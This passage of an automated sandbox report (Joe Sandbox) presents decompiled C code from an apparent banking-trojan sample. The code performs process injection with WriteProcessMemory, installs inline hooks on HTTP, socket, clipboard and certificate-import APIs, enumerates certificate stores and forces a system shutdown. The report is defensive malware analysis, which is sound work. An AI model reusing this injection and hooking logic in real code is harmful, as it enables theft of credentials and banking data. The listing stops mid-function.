                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
                • String ID:
                • API String ID: 1842529175-0
                • Opcode ID: 4a69be791d787109f8a23c9fc7be24d0ef96215065c2b7820b912699eabde2e8
                • Instruction ID: fab364c6def25275bb3281427fc48cef89a3d807a0e0085f1856621d357f98a3
                • Opcode Fuzzy Hash: 4a69be791d787109f8a23c9fc7be24d0ef96215065c2b7820b912699eabde2e8
                • Instruction Fuzzy Hash: 52F0E5326812116BC71117356E5CFE7BB6CEB52B61B100123FAA5E32A09EB88890857C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040F02D(void* __eax, void* _a4) {
                				char _v5;
                				signed int _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				long _v24;
                				void* _t35;
                				void** _t39;
                				void* _t41;
                				intOrPtr* _t42;
                				int _t43;
                				long _t45;
                				void* _t46;
                				SIZE_T* _t47;
                				signed int _t49;
                				void** _t52;
                				void* _t54;
                				void* _t55;
                				void* _t60;
                				intOrPtr _t61;
                				intOrPtr _t62;
                				unsigned int _t64;
                
                				_t55 = __eax;
                				_t1 = _t55 + 0x3c; // 0xe0
                				_t60 =  *_t1 + __eax;
                				_t45 =  *(_t60 + 0x50);
                				_v24 = _t45;
                				_v5 = 0;
                				if(IsBadReadPtr(__eax, _t45) == 0) {
                					_t35 = VirtualAllocEx(_a4, 0, _t45, 0x3000, 0x40);
                					_v12 = _t35;
                					__eflags = _t35;
                					if(__eflags == 0) {
                						L17:
                						return _v12;
                					}
                					_t46 = E0040984A(__eflags, _t55, _t45);
                					_t47 = 0;
                					__eflags = _t46;
                					if(_t46 == 0) {
                						L16:
                						VirtualFreeEx(_a4, _v12, 0, 0x8000);
                						_t30 =  &_v12;
                						 *_t30 = _v12 & 0x00000000;
                						__eflags =  *_t30;
                						goto L17;
                					}
                					_t7 = _t60 + 0xa0; // 0x180
                					_t39 = _t7;
                					__eflags = _t39[1];
                					if(_t39[1] <= 0) {
                						L15:
                						E004097F7(_t46);
                						__eflags = _v5;
                						if(_v5 != 0) {
                							goto L17;
                						}
                						goto L16;
                					}
                					_t41 =  *_t39;
                					__eflags = _t41;
                					if(_t41 <= 0) {
                						goto L15;
                					}
                					_t61 =  *((intOrPtr*)(_t60 + 0x34));
                					_t54 = _v12 - _t61;
                					_v20 = _t55 - _t61;
                					_t42 = _t41 + _t46;
                					while(1) {
                						__eflags =  *_t42 - _t47;
                						if( *_t42 == _t47) {
                							break;
                						}
                						_t62 =  *((intOrPtr*)(_t42 + 4));
                						__eflags = _t62 - 8;
                						if(_t62 < 8) {
                							L12:
                							_t42 = _t42 +  *((intOrPtr*)(_t42 + 4));
                							_t47 = 0;
                							__eflags = 0;
                							continue;
                						}
                						_t64 = _t62 + 0xfffffff8 >> 1;
                						__eflags = _t64;
                						_v16 = _t47;
                						if(_t64 == 0) {
                							goto L12;
                						} else {
                							goto L9;
                						}
                						do {
                							L9:
                							_t49 =  *(_t42 + 8 + _v16 * 2) & 0x0000ffff;
                							__eflags = _t49;
                							if(_t49 > 0) {
                								_t52 = (_t49 & 0x00000fff) +  *_t42 + _t46;
                								 *_t52 =  *_t52 + _t54 - _v20;
                								__eflags =  *_t52;
                							}
                							_v16 = _v16 + 1;
                							__eflags = _v16 - _t64;
                						} while (_v16 < _t64);
                						goto L12;
                					}
                					_t43 = WriteProcessMemory(_a4, _v12, _t46, _v24, _t47);
                					__eflags = _t43;
                					_t26 =  &_v5;
                					 *_t26 = _t43 != 0;
                					__eflags =  *_t26;
                					goto L15;
                				}
                				return 0;
                			}


                APIs
                • IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,?,00000000), ref: 0040F049
                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,00000000), ref: 0040F067
                • WriteProcessMemory.KERNEL32(?,?,00000000,00400000,00000000,00400000,?,?,?,00000000), ref: 0040F0F9
                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00400000,?,?,?,00000000), ref: 0040F11E
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$AllocFreeMemoryProcessReadWrite
                • String ID:
                • API String ID: 1273498236-0
                • Opcode ID: 84ad69b87decf04be3d46b84e04468c55a7085d49f39b4800930ad0b6f13d16f
                • Instruction ID: 8074815a5f094fbe943c1ac7a8fddec3e3c8108676363f5637a343672aedc4ac
                • Opcode Fuzzy Hash: 84ad69b87decf04be3d46b84e04468c55a7085d49f39b4800930ad0b6f13d16f
                • Instruction Fuzzy Hash: EA31A332A00209AFCB249FA4CC44BAEBBB5EF45715F05807AE501BB6E1C7789D54CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040F36F(intOrPtr _a4) {
                				intOrPtr _v20;
                				void* _v32;
                				signed int _t6;
                				signed int _t7;
                				int _t9;
                				int _t14;
                				void* _t15;
                
                				_t14 = 0;
                				_t6 = CreateToolhelp32Snapshot(4, 0);
                				_t15 = _t6;
                				_t7 = _t6 | 0xffffffff;
                				if(_t15 != _t7) {
                					_v32 = 0x1c;
                					_t9 = Thread32First(_t15,  &_v32);
                					while(_t9 != 0) {
                						if(_v20 == _a4) {
                							_t14 = _t14 + 1;
                						}
                						_t9 = Thread32Next(_t15,  &_v32);
                					}
                					CloseHandle(_t15);
                					return _t14;
                				}
                				return _t7;
                			}


                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040F37C
                • Thread32First.KERNEL32 ref: 0040F396
                • Thread32Next.KERNEL32 ref: 0040F3AB
                • CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 0040F3B5
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 3643885135-0
                • Opcode ID: f167ec629c316ef8e7e0489b20491c4ce64d70c5151b35724110d53dce581c98
                • Instruction ID: 47ccc5688c713e21e1b85cbc754401cc5076cbcf8c49e09458edf4030a5e9cdc
                • Opcode Fuzzy Hash: f167ec629c316ef8e7e0489b20491c4ce64d70c5151b35724110d53dce581c98
                • Instruction Fuzzy Hash: DBF082B2510115EADB30B6BA8C05DEF76ACDBC1374B000137FE21E22C5D638994686BA
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • socket.WS2_32(00000000,00000001,00000006), ref: 0040C96A
                • bind.WS2_32(00000000,?,-0000001D), ref: 0040C98A
                • listen.WS2_32(00000000,?), ref: 0040C999
                • closesocket.WS2_32(00000000), ref: 0040C9A4
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesocketlistensocket
                • String ID:
                • API String ID: 952684215-0
                • Opcode ID: 70712e34430590b13c48ee905619d286c87f727d92cf5e7e1719adfaecf550a6
                • Instruction ID: ed0ed7285797de249a81ced6a17e3e2b72e0ea6a530c276d0029bd9c35f4a7d8
                • Opcode Fuzzy Hash: 70712e34430590b13c48ee905619d286c87f727d92cf5e7e1719adfaecf550a6
                • Instruction Fuzzy Hash: F4F03076200101AAE2201F39DD89E2F29A9AB857B1B144729FD61E25F0E73CC492D629
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00415300() {
                				void* __ecx;
                				signed char _t6;
                				unsigned int _t9;
                				void* _t14;
                
                				_t15 =  *0x41ac60 & 0x00000008;
                				if(( *0x41ac60 & 0x00000008) != 0) {
                					E00408E58(_t14, _t15);
                				}
                				_t6 =  *0x41ac60; // 0x0
                				if((_t6 & 0x00000003) == 0) {
                					__eflags = _t6 & 0x00000004;
                					if((_t6 & 0x00000004) != 0) {
                						return ExitWindowsEx(0x14, 0x80000000);
                					}
                					return _t6;
                				} else {
                					E0040F3C3(L"SeShutdownPrivilege");
                					_t9 =  *0x41ac60; // 0x0
                					__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t9 >> 0x00000001 & 0x00000001, 0x80000000);
                					return 0;
                				}
                			}


                APIs
                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 00415339
                  • Part of subcall function 00408E58: PathRemoveFileSpecW.SHLWAPI(?,00000000), ref: 00408E7F
                  • Part of subcall function 00408E58: PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00408E92
                  • Part of subcall function 00408E58: SHDeleteValueW.SHLWAPI(80000001,Software\Microsoft\Windows\Currentversion\Run,00000000,FF220823,00000000,00000000,00000000), ref: 00408EC6
                  • Part of subcall function 00408E58: Sleep.KERNEL32(000001F4), ref: 00408ED5
                  • Part of subcall function 00408E58: SHDeleteKeyW.SHLWAPI(80000001,?,00000002), ref: 00408F1F
                  • Part of subcall function 00408E58: CharToOemW.USER32 ref: 00408F3B
                  • Part of subcall function 00408E58: CharToOemW.USER32 ref: 00408F4A
                  • Part of subcall function 00408E58: ExitProcess.KERNEL32 ref: 00408F98
                • ExitWindowsEx.USER32(00000014,80000000), ref: 0041534C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CharDeleteExitFilePathRemoveSpec$InitiateProcessShutdownSleepSystemValueWindows
                • String ID: SeShutdownPrivilege
                • API String ID: 526012596-3733053543
                • Opcode ID: 9a206f1256d4e2171c0299b9aa3478b057f90b5e2fcde28635703dfaca5ebcf6
                • Instruction ID: 1b00e2299b31ef3c9a9203ecf18d4972554ae16369f4e30f4f425ce5efb7265d
                • Opcode Fuzzy Hash: 9a206f1256d4e2171c0299b9aa3478b057f90b5e2fcde28635703dfaca5ebcf6
                • Instruction Fuzzy Hash: DBE09272110A48AAEA0457649C4DFF62618A701B54F1C803EBEA2F56E1CFB84850D76D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404ACF(char __eax, void* __ecx) {
                				char _v5;
                				char _v6;
                				long _v12;
                				char _v16;
                				void* _v20;
                				void* _t19;
                				signed int _t28;
                				intOrPtr* _t34;
                				void* _t37;
                
                				_v6 = 1;
                				if(__eax > 0) {
                					_t34 = __ecx + 8;
                					_v16 = __eax;
                					do {
                						_t19 =  *_t34;
                						_v20 = _t19;
                						if(_t19 != 0) {
                							_t4 = _t34 - 8; // 0x774c084
                							_t37 =  *_t4;
                							_t5 = _t34 + 4; // 0xffffd536
                							_t28 =  *_t5 & 0x000000ff;
                							_v5 = 0;
                							if(E0040F1C2(_t37) < 0x1e || VirtualProtectEx(0xffffffff, _t37, 0x1e, 0x40,  &_v12) == 0) {
                								L8:
                								_v6 = 0;
                							} else {
                								if(WriteProcessMemory(0xffffffff, _t37, _v20, _t28 + 0xfffffffb, 0) != 0) {
                									_v5 = 1;
                								}
                								VirtualProtectEx(0xffffffff, _t37, 0x1e, _v12,  &_v12);
                								if(_v5 == 0) {
                									goto L8;
                								}
                							}
                						}
                						_t34 = _t34 + 0x10;
                						_t14 =  &_v16;
                						 *_t14 = _v16 - 1;
                					} while ( *_t14 != 0);
                				}
                				return _v6;
                			}


                APIs
                  • Part of subcall function 0040F1C2: VirtualQueryEx.KERNEL32(000000FF,0774C084,?,0000001C,00407790,0774C084,?,?,?,00404B07,00000000,00000000,00000012,00419020), ref: 0040F1D7
                • VirtualProtectEx.KERNEL32(000000FF,0774C084,0000001E,00000040,00407798,00000000,00000000,00000012,00419020), ref: 00404B17
                • WriteProcessMemory.KERNEL32(000000FF,0774C084,00000000,FFFFD43B,00000000), ref: 00404B2D
                • VirtualProtectEx.KERNEL32(000000FF,0774C084,0000001E,00407798,00407798), ref: 00404B47
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$Protect$MemoryProcessQueryWrite
                • String ID:
                • API String ID: 2789181485-0
                • Opcode ID: 26b50c01a02812a2d6a86d8d59b5b5736a5ff8fe8426d9e9b1b4af505c149573
                • Instruction ID: fdbbd4a742bd5c088ddcb12c68aa649a7ddd15408f3d92e008fc95d6a5c51c48
                • Opcode Fuzzy Hash: 26b50c01a02812a2d6a86d8d59b5b5736a5ff8fe8426d9e9b1b4af505c149573
                • Instruction Fuzzy Hash: C11108B1E042897AEB1097A98C04BDFBFB89F45374F1442A6E630B22D1C778D944C764
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040344C(void* __ecx, void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
                				void _v28;
                				long _v32;
                				intOrPtr _v40;
                				void* __edi;
                				void* __esi;
                				void* _t17;
                				void* _t24;
                				void* _t29;
                				void* _t31;
                				void* _t33;
                				void* _t37;
                
                				_t31 = __edx;
                				_t29 = __ecx;
                				_t17 = E00407B3F();
                				_t33 = _a16;
                				if(_t17 != 0 && NtQueryInformationProcess(_t33, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E0040F36F(_v28) == 0)) {
                					_t37 = E0040797B(_t29, _t31, _v28);
                					_t46 = _t37;
                					if(_t37 != 0) {
                						_t24 = E00407A4C(_t29, _t33, _t37, _t46, _t37, 0);
                						if(_t24 != 0) {
                							 *((intOrPtr*)(_a24 + 0xb0)) = _t24 -  *0x4192e4 + E00407F43;
                						}
                						CloseHandle(_t37);
                					}
                				}
                				E00407B30();
                				return NtCreateThread(_a4, _a8, _a12, _t33, _a20, _a24, _a28, _a32);
                			}


                APIs
                  • Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47
                • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00403472
                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 004034C7
                  • Part of subcall function 0040F36F: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040F37C
                  • Part of subcall function 0040F36F: Thread32First.KERNEL32 ref: 0040F396
                  • Part of subcall function 0040F36F: CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 0040F3B5
                • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 004034E8
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
                • String ID:
                • API String ID: 3154080929-0
                • Opcode ID: 2761cff95fa166759bebcb4aa842a57fcbbdd640e82233aeda5ac450ef6b62f8
                • Instruction ID: 4bd36c88d60e0a7c6a905535dd692b24cbb0113c4165deea47f68822682f32ad
                • Opcode Fuzzy Hash: 2761cff95fa166759bebcb4aa842a57fcbbdd640e82233aeda5ac450ef6b62f8
                • Instruction Fuzzy Hash: 93118131924205ABCB12AF51DC05FAB3B69AF45705F04423AF944B51E0D739DA11DB9E
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • socket.WS2_32(00000000,00000002,00000011), ref: 0040CC5A
                • bind.WS2_32(00000000,00000017,-0000001D), ref: 0040CC7A
                • closesocket.WS2_32(00000000), ref: 0040CC85
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesocketsocket
                • String ID:
                • API String ID: 1873677229-0
                • Opcode ID: 33c749d1f7e24bcc6b39e651dbe84e6eed1318190367da391c55015d580aafda
                • Instruction ID: 7669656143e3fa2b294f97f418d307bd0995f9ad104b1e7561b3365cfa2af3d7
                • Opcode Fuzzy Hash: 33c749d1f7e24bcc6b39e651dbe84e6eed1318190367da391c55015d580aafda
                • Instruction Fuzzy Hash: 09E04F26200515A6F2202B39ED4EA6F25A99B85771B280729BD75E21E1E77C88819124
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E0040F810(char* __esi) {
                				void* _v40;
                				intOrPtr _v46;
                				signed char _v48;
                				struct _OSVERSIONINFOW _v324;
                				int _t15;
                				signed int _t18;
                				short _t22;
                				char* _t24;
                
                				_t24 = __esi;
                				E00409898(__esi, 6);
                				_v324.dwOSVersionInfoSize = 0x11c;
                				_t15 = GetVersionExW( &_v324);
                				if(_t15 != 0) {
                					__imp__GetNativeSystemInfo( &_v40);
                					 *__esi = E0040F73A();
                					_t18 = 0;
                					if(_v48 <= 0xff && _v46 == 0) {
                						_t18 = _v48 & 0x000000ff;
                					}
                					 *(_t24 + 1) = _t18;
                					asm("sbb eax, eax");
                					 *((short*)(_t24 + 2)) =  !0xffff & _v324.dwBuildNumber;
                					_t22 = _v40;
                					 *((short*)(_t24 + 4)) = _t22;
                					return _t22;
                				}
                				return _t15;
                			}


                APIs
                • GetVersionExW.KERNEL32(?,?,00000006), ref: 0040F832
                • GetNativeSystemInfo.KERNEL32(?), ref: 0040F840
                  • Part of subcall function 0040F73A: GetVersionExW.KERNEL32(?,00000000), ref: 0040F759
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Version$InfoNativeSystem
                • String ID:
                • API String ID: 2518960133-0
                • Opcode ID: 9c29b827f22e575af9015e86294a178a685f2c8f9935fa3d3f02acf626f85291
                • Instruction ID: 4c9715b61aedd603feeec6df2d52423eec6b4558fe666b08631694fbdbaa6ecf
                • Opcode Fuzzy Hash: 9c29b827f22e575af9015e86294a178a685f2c8f9935fa3d3f02acf626f85291
                • Instruction Fuzzy Hash: 6C0186359002558ADB31EFB5C8016DDB7F4AF08700F04C47AD555F3691E7389A45CB69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E0041000E(void* __ecx) {
                				void* _v8;
                				char* _t12;
                				intOrPtr _t13;
                				intOrPtr* _t14;
                				intOrPtr* _t16;
                				intOrPtr* _t18;
                				intOrPtr* _t20;
                				void* _t27;
                
                				_t12 =  &_v8;
                				_v8 = 0;
                				__imp__CoCreateInstance(0x4013f8, 0, 0x4401, 0x4013e8, _t12, _t27, __ecx);
                				if(_t12 != 0) {
                					_t13 = 0;
                				} else {
                					_t14 = _v8;
                					 *((intOrPtr*)( *_t14 + 0xfc))(_t14, 0);
                					_t16 = _v8;
                					 *((intOrPtr*)( *_t16 + 0x120))(_t16, 0);
                					_t18 = _v8;
                					 *((intOrPtr*)( *_t18 + 0x118))(_t18, 0);
                					_t20 = _v8;
                					 *((intOrPtr*)( *_t20 + 0x110))(_t20, 0xffffffff);
                					_t13 = _v8;
                				}
                				return _t13;
                			}


                APIs
                • CoCreateInstance.OLE32(004013F8,00000000,00004401,004013E8,?,?,?,?,00410087,?,?,?,?,00405EBD,?,?), ref: 0041002C
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CreateInstance
                • String ID:
                • API String ID: 542301482-0
                • Opcode ID: 54c140d9d07095d6e411c4dbcdfcf86d96e6f9ec4e4d4b5a9dac7fbc9e287d61
                • Instruction ID: 01f3b6a20daedb2ce8c8538526029bd1b8293e8301c767b16616f8f823f4850d
                • Opcode Fuzzy Hash: 54c140d9d07095d6e411c4dbcdfcf86d96e6f9ec4e4d4b5a9dac7fbc9e287d61
                • Instruction Fuzzy Hash: 1701FB74A00218FFDB14CBA5C94DEDB7BBCEF49350F2001A5F805EB290D675AE01DA64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00409921() {
                				long _t7;
                				signed int _t8;
                				intOrPtr _t9;
                				void* _t12;
                				void* _t14;
                
                				_t12 = _t14 - 0x78;
                				_t7 = GetTimeZoneInformation(_t12 - 0x34);
                				if(_t7 != 1) {
                					if(_t7 != 2) {
                						_t8 = 0;
                					} else {
                						_t9 =  *((intOrPtr*)(_t12 + 0x74));
                						goto L4;
                					}
                				} else {
                					_t9 =  *((intOrPtr*)(_t12 + 0x20));
                					L4:
                					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
                				}
                				return _t8;
                			}


                APIs
                • GetTimeZoneInformation.KERNEL32(?), ref: 00409930
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: InformationTimeZone
                • String ID:
                • API String ID: 565725191-0
                • Opcode ID: 71c243f59b7b7fe53b86fcbf7f0dda3a94e9e9df00154b385325f1dd7b959907
                • Instruction ID: 547fc9c690d88fc5e43e67ddb9578f59667ae86ff06400956070093446b39d7c
                • Opcode Fuzzy Hash: 71c243f59b7b7fe53b86fcbf7f0dda3a94e9e9df00154b385325f1dd7b959907
                • Instruction Fuzzy Hash: 51E08671644109CBDB64EBA4DE8199E77F9AB05314F30053AE551F23D1D238DD45CB46
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 41%
                			E00404CCE() {
                				intOrPtr _t1;
                				intOrPtr _t2;
                				signed int _t19;
                				void* _t21;
                				void* _t22;
                
                				_t1 =  *0x4192f4;
                				if(_t1 == 0) {
                					_t1 =  *0x4192f0;
                					 *0x419024 = E0040344C;
                				} else {
                					 *0x419024 = E004034F6;
                				}
                				 *0x419020 = _t1;
                				_t2 =  *0x419304; // 0x77e27840
                				 *0x419030 = _t2;
                				 *0x419040 = GetFileAttributesExW;
                				 *0x419050 = HttpSendRequestW;
                				 *0x419060 = HttpSendRequestA;
                				 *0x419070 = HttpSendRequestExW;
                				 *0x419080 = HttpSendRequestExA;
                				 *0x419090 = InternetCloseHandle;
                				 *0x4190a0 = InternetReadFile;
                				 *0x4190b0 = __imp__InternetReadFileExA;
                				 *0x4190c0 = InternetQueryDataAvailable;
                				 *0x4190d0 = HttpQueryInfoA;
                				 *0x4190e0 = __imp__#3;
                				 *0x4190f0 = __imp__#19;
                				 *0x419100 = __imp__WSASend;
                				 *0x419110 = TranslateMessage;
                				_push(1);
                				 *0x419120 = GetClipboardData;
                				_push(0x419020);
                				 *0x419130 = __imp__PFXImportCertStore;
                				_t19 = 0x12;
                				return E00404B67(_t19, _t21, _t22);
                			}

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: @xw
                • API String ID: 0-2821512424
                • Opcode ID: 0969e254e03a2270fea158f6c43fdf33fb151ae1608f7024747e2f362ae41a72
                • Instruction ID: be441782d3f59f62b8afdcf9d7c29dff139ab07449f0e4a564e049814f0b3567
                • Opcode Fuzzy Hash: 0969e254e03a2270fea158f6c43fdf33fb151ae1608f7024747e2f362ae41a72
                • Instruction Fuzzy Hash: 6B21B2B8A452419FE384CF68EAA5B803BF4B34C744705827AE949E7771E375AD40DB0C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E0040C570(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr* _v16;
                				signed int _v20;
                				unsigned int _t67;
                				signed int _t68;
                				intOrPtr _t71;
                				void* _t79;
                				signed int _t81;
                				intOrPtr _t87;
                				intOrPtr _t88;
                				signed int _t98;
                				signed int _t99;
                				signed int _t100;
                				signed int _t101;
                				signed int _t102;
                				unsigned int _t103;
                				signed int _t104;
                				signed int _t106;
                				signed int _t108;
                				signed int _t111;
                				signed int _t115;
                				signed int _t116;
                				intOrPtr* _t119;
                				unsigned int _t125;
                				signed int _t126;
                				signed int _t128;
                
                				_t71 = _a4;
                				_t98 = 0;
                				_t99 = 0;
                				_v16 = 0;
                				_v20 = 1;
                				L1:
                				while(1) {
                					if(_t99 <= 0) {
                						_t103 =  *(_t98 + _t71);
                						_t98 = _t98 + 4;
                						_t99 = 0x1f;
                						_t104 = _t103 >> 0x1f;
                					} else {
                						_t99 = _t99 - 1;
                						_t104 = _t67 >> _t99 & 0x00000001;
                					}
                					if(_t104 != 0) {
                						_v16 = _v16 + 1;
                						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
                						_t98 = _t98 + 1;
                						L6:
                						_t71 = _a4;
                						continue;
                					}
                					_v12 = 1;
                					do {
                						if(_t99 <= 0) {
                							_t67 =  *(_t98 + _t71);
                							_t98 = _t98 + 4;
                							_t100 = 0x1f;
                							_t106 = _t67 >> 0x1f;
                						} else {
                							_t100 = _t99 - 1;
                							_t106 = _t67 >> _t100 & 0x00000001;
                						}
                						_v12 = _t106 + _v12 * 2;
                						if(_t100 <= 0) {
                							_t67 =  *(_t98 + _t71);
                							_t98 = _t98 + 4;
                							_t99 = 0x1f;
                							_t108 = _t67 >> 0x1f;
                						} else {
                							_t99 = _t100 - 1;
                							_t108 = _t67 >> _t99 & 0x00000001;
                						}
                					} while (_t108 == 0);
                					_t111 = _v12;
                					if(_t111 == 2) {
                						_t81 = _v20;
                						L19:
                						_v12 = _t81;
                						if(_t99 <= 0) {
                							_t67 =  *(_t98 + _t71);
                							_t98 = _t98 + 4;
                							_t101 = 0x1f;
                							_v8 = _t67 >> 0x1f;
                						} else {
                							_t101 = _t99 - 1;
                							_v8 = _t67 >> _t101 & 0x00000001;
                						}
                						if(_t101 <= 0) {
                							_t67 =  *(_t98 + _t71);
                							_t98 = _t98 + 4;
                							_t99 = 0x1f;
                							_t115 = _t67 >> 0x1f;
